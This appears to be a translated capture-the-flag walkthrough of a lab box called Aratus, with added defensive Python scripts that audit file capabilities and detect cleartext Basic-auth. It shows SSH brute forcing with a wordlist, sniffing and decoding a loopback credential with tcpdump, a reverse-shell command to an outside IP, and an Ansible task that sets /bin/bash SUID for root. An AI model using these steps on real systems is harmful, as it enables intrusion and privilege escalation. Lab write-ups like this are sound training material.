Port scanning

nmap --min-rate=10000 -p- 10.10.237.69         
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 15:18 UTC
Nmap scan report for ip-10-10-149-178.eu-west-1.compute.internal (10.10.237.69)
Host is up (0.011s latency).
Not shown: 65510 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
MAC Address: 02:A4:78:F1:74:81 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds
nmap -sV -sT -sC -O -p21,22,80,139,443,445 10.10.237.69
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 15:20 UTC
Nmap scan report for ip-10-10-149-178.eu-west-1.compute.internal (10.10.237.69)
Host is up (0.00052s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.171.240
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 092362a2186283690440623297ff3ccd (RSA)
| 256 33663536b0680632c18af601bc4338ce (ECDSA)
|_ 256 1498e3847055e6600cc20977f8b7a61c (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=aratus/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-11-23T12:28:26
|_Not valid after: 2022-11-23T12:28:26
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
MAC Address: 02:A4:78:F1:74:81 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running (JUST GUESSING): Linux 3.X (98%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 3.10 - 3.13 (98%), Linux 3.8 (92%), Crestron XPanel control system (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ARATUS; OS: Unix

Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.16)
| Computer name: aratus
| NetBIOS computer name: ARATUS\x00
| Domain name: \x00
| FQDN: aratus
|_ System time: 2023-12-26T16:20:29+01:00
| smb2-time:
| date: 2023-12-26T15:20:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.49 seconds

Getshell

Anonymous FTP login works; there is a pub directory, but it is empty.

enum4linux turns up a share:

   print$          Disk      Printer Drivers
   temporary share Disk      
smbclient //10.10.237.69/'temporary share'
Password for [WORKGROUP\mikannse]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 10 13:06:44 2022
.. D 0 Tue Nov 23 16:24:05 2021
.bash_logout H 18 Wed Apr 1 02:17:30 2020
.bash_profile H 193 Wed Apr 1 02:17:30 2020
.bashrc H 231 Wed Apr 1 02:17:30 2020
.bash_history H 0 Sun Mar 17 14:01:57 2024
chapter1 D 0 Tue Nov 23 10:07:47 2021
chapter2 D 0 Tue Nov 23 10:08:11 2021
chapter3 D 0 Tue Nov 23 10:08:18 2021
chapter4 D 0 Tue Nov 23 10:08:25 2021
chapter5 D 0 Tue Nov 23 10:08:33 2021
chapter6 D 0 Tue Nov 23 10:12:24 2021
chapter7 D 0 Tue Nov 23 11:14:27 2021
chapter8 D 0 Tue Nov 23 10:12:45 2021
chapter9 D 0 Tue Nov 23 10:12:53 2021
.ssh DH 0 Mon Jan 10 13:05:34 2022
.viminfo H 0 Sun Mar 17 14:01:57 2024
message-to-simeon.txt N 251 Mon Jan 10 13:06:44 2022

37726212 blocks of size 1024. 35598260 blocks available

There is a note:

Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...

Also you password is insecure, could you please change it? It is all over the place now!

- Theodore

I tried brute-forcing SSH directly, but that didn't seem to be allowed. Fine: according to the hint, the password seems to be made of words from his book, but as soon as I started brute-forcing it errored out, and restarting the target machine didn't help either. I couldn't get it to work!

Anyway, in the end:

cewl http://10.10.237.69/simeon/ >word.txt
hydra -l simeon -P word.txt ssh://10.10.237.69 -v

The password is: scelerisque

Lateral movement

There isn't much other information, but the kernel version is very old, so I tried Dirty COW; it failed, apparently because some permission was missing. So I uploaded pspy instead.

/usr/bin/python3 /home/theodore/scripts/test-www-auth.py

/bin/sh -c ping -c 30 127.0.0.1 >/dev/null 2>&1

Two suspicious processes show up: the box is pinging itself? The room also hints at pcap.

getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/suexec = cap_setgid,cap_setuid+ep

tcpdump is usable: it carries cap_net_raw (and cap_net_admin) in its effective set (+eip), so an unprivileged user can capture packets with it.
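The getcap listing above is the kind of thing a defender should review on every host, because the difference between `+p` and `+eip` decides who can actually use the capability. The following script is an added example (not part of the original writeup or the room): it parses getcap output, flags capabilities worth reviewing, and lists the binaries that give any local caller packet capture. The sample text is a copy of the listing on this page; the SENSITIVE table and the function names are my own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the format `getcap -r /` prints (old libcap style "path = caps";
# newer libcap prints "path caps=flags", which the parser below also accepts).
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
"""

# Capabilities worth a second look when any local user can execute the binary (my selection).
SENSITIVE = {
    "cap_net_raw": "raw sockets: packet capture on any interface",
    "cap_net_admin": "network configuration",
    "cap_setuid": "change user id",
    "cap_setgid": "change group id",
    "cap_sys_admin": "broad administrative control",
    "cap_dac_override": "bypass file permission checks",
    "cap_dac_read_search": "read and search any file",
}

# One cap_to_text(3) clause: "name[,name...]" then '+' or '=' then flags drawn from e/i/p.
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]*)$")


@dataclass
class CapEntry:
    path: str
    caps: dict = field(default_factory=dict)  # capability name -> flag string


def parse_getcap(text):
    """Parse getcap output into CapEntry objects; unparseable lines are skipped."""
    entries = []
    for raw in text.splitlines():
        parts = raw.strip().split(None, 1)
        if len(parts) != 2:
            continue
        path, cap_text = parts
        if cap_text.startswith("="):          # old format: "path = caps"
            cap_text = cap_text[1:].strip()
        entry = CapEntry(path)
        for clause in cap_text.split():
            m = CLAUSE_RE.match(clause)
            if not m:
                continue
            for name in m.group("names").split(","):
                entry.caps[name] = m.group("flags")
        if entry.caps:
            entries.append(entry)
    return entries


def risky_entries(entries):
    """Return (path, capability, how) for every sensitive capability on a binary.
    'effective at exec' means the kernel raises it when the program starts, so it is live
    for whatever the program does; 'permitted only' means the program must raise it itself."""
    findings = []
    for e in entries:
        for cap, flags in sorted(e.caps.items()):
            if cap in SENSITIVE:
                how = "effective at exec" if "e" in flags else "permitted only"
                findings.append((e.path, cap, how))
    return findings


def capture_capable_binaries(entries):
    """Paths that let an unprivileged caller sniff traffic: cap_net_raw effective at exec."""
    return [e.path for e in entries if "e" in e.caps.get("cap_net_raw", "")]


if __name__ == "__main__":
    parsed = parse_getcap(SAMPLE_GETCAP)
    for path, cap, how in risky_entries(parsed):
        print(f"{path}: {cap} ({SENSITIVE[cap]}) - {how}")
    print("packet capture without root:", capture_capable_binaries(parsed))
```

Run it on the real output of `getcap -r / 2>/dev/null` to get the same report for a host; on this box it singles out /usr/sbin/tcpdump, which is exactly the binary the rest of the writeup relies on.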

tcpdump -i lo -A

An HTTP request shows up in the capture:

........GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=

Base64-decoding the Authorization header gives: theodore:Rijyaswahebceibarjik

Moving to theodore
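The lesson here is that HTTP Basic auth over plain HTTP, even on the loopback interface, is a cleartext credential for anyone who can capture packets. As an added example (mine, not from the writeup), here is a small checker that walks `tcpdump -A`-style text, finds requests carrying an Authorization header, and decodes Basic credentials just far enough to name the account while redacting the password. The capture text and the svc_monitor credential inside it are constructed for the demo; the function names are my own.

```python
import base64
import binascii
import re

# Request line as it appears in `tcpdump -A` output; preceding packet bytes print as dots,
# so we search within the line rather than anchor at its start.
REQUEST_LINE = re.compile(r"(GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/1\.[01]\s*$")


def _build_sample_capture():
    """Constructed capture text in tcpdump -A style; the credential is made up for the demo."""
    token = base64.b64encode(b"svc_monitor:ConstructedPass1").decode()
    return (
        "..E..f..@.@.........GET /test-auth/index.html HTTP/1.1\r\n"
        "Host: 127.0.0.1\r\n"
        "User-Agent: python-requests/2.14.2\r\n"
        "Accept: */*\r\n"
        f"Authorization: Basic {token}\r\n"
        "\r\n"
        "..E..f..@.@.........HTTP/1.1 200 OK\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
        "..E..f..@.@.........GET /api/status HTTP/1.1\r\n"
        "Host: 127.0.0.1\r\n"
        "Authorization: Bearer constructed-opaque-token\r\n"
        "\r\n"
    )


SAMPLE_CAPTURE = _build_sample_capture()


def split_requests(capture_text):
    """Return [{method, path, headers}] for each HTTP request in the capture text.
    Header names are lower-cased; a blank line ends the header block."""
    requests, current = [], None
    for line in capture_text.splitlines():
        m = REQUEST_LINE.search(line)
        if m:
            current = {"method": m.group(1), "path": m.group(2), "headers": {}}
            requests.append(current)
            continue
        if current is None:
            continue
        if not line.strip():
            current = None
            continue
        name, sep, value = line.partition(":")
        if sep:
            current["headers"][name.strip().lower()] = value.strip()
    return requests


def decode_basic(value):
    """(user, password) from an 'Authorization: Basic <b64>' value, or None if not Basic/malformed."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def redact(secret):
    """Keep the first character so findings can be correlated without logging the secret."""
    return secret[:1] + "*" * (len(secret) - 1) if secret else ""


def find_exposed_credentials(capture_text):
    """Every request carrying an Authorization header in a plaintext capture is a finding;
    Basic credentials are decoded to identify the account, with the password redacted."""
    findings = []
    for req in split_requests(capture_text):
        auth = req["headers"].get("authorization")
        if not auth:
            continue
        finding = {
            "host": req["headers"].get("host", "?"),
            "path": req["path"],
            "scheme": auth.split(" ", 1)[0],
        }
        creds = decode_basic(auth)
        if creds:
            finding["user"] = creds[0]
            finding["password"] = redact(creds[1])
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_exposed_credentials(SAMPLE_CAPTURE):
        print(f)
```

Bearer tokens are reported but not decoded, since a token sent in cleartext is just as much of a finding as a password. The fix on the box side is the usual one: put the service behind TLS or a local socket rather than HTTP on 127.0.0.1, and do not grant cap_net_raw to binaries every user can run.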

[theodore@aratus scripts]$ sudo -l
匹配 %2$s 上 %1$s 的默认条目:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

用户 theodore 可以在 aratus 上运行以下命令:
(automation) NOPASSWD: /opt/scripts/infra_as_code.sh

Privilege escalation

Its contents are:

#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml

Ansible is Red Hat's automation and deployment tool, and running the script via sudo does indeed carry out some automated work.

Looking for writable files turns up:

find /opt/ansible/ -type f -writable
/opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml
/opt/ansible/README.txt

Append the following to the end of /opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml:

- name: bash
  command: chmod +s /bin/bash

Originally I had set up a reverse shell instead, but it errored out:

fatal: [10.10.237.69]: FAILED! => {"changed": true, "cmd": ["/bin/sh", "-i", ">&", "/dev/tcp/10.11.77.28/443", "0>&1"], "delta": "0:00:00.004717", "end": "2024-03-17 16:41:41.083234", "msg": "non-zero return code", "rc": 127, "start": "2024-03-17 16:41:41.078517", "stderr": "sh: >&: 没有那个文件或目录", "stderr_lines": ["sh: >&: 没有那个文件或目录"], "stdout": "", "stdout_lines": []}     

I'm not entirely sure what happened. The error message does point at the cause, though: rc 127 together with "sh: >&: 没有那个文件或目录" means that sh -i received ">&" as a separate argument and tried to execute it as a command name. Ansible's command module runs its argument list directly rather than through a shell, so redirection operators are never interpreted.

sudo -u automation /opt/scripts/infra_as_code.sh

/bin/bash -p

Now we are root.

Closing thoughts

Quite an interesting room. cewl, used at the start to pull keywords out of a web page, is a really nice tool, and the later tcpdump and Ansible parts were fresh material for me.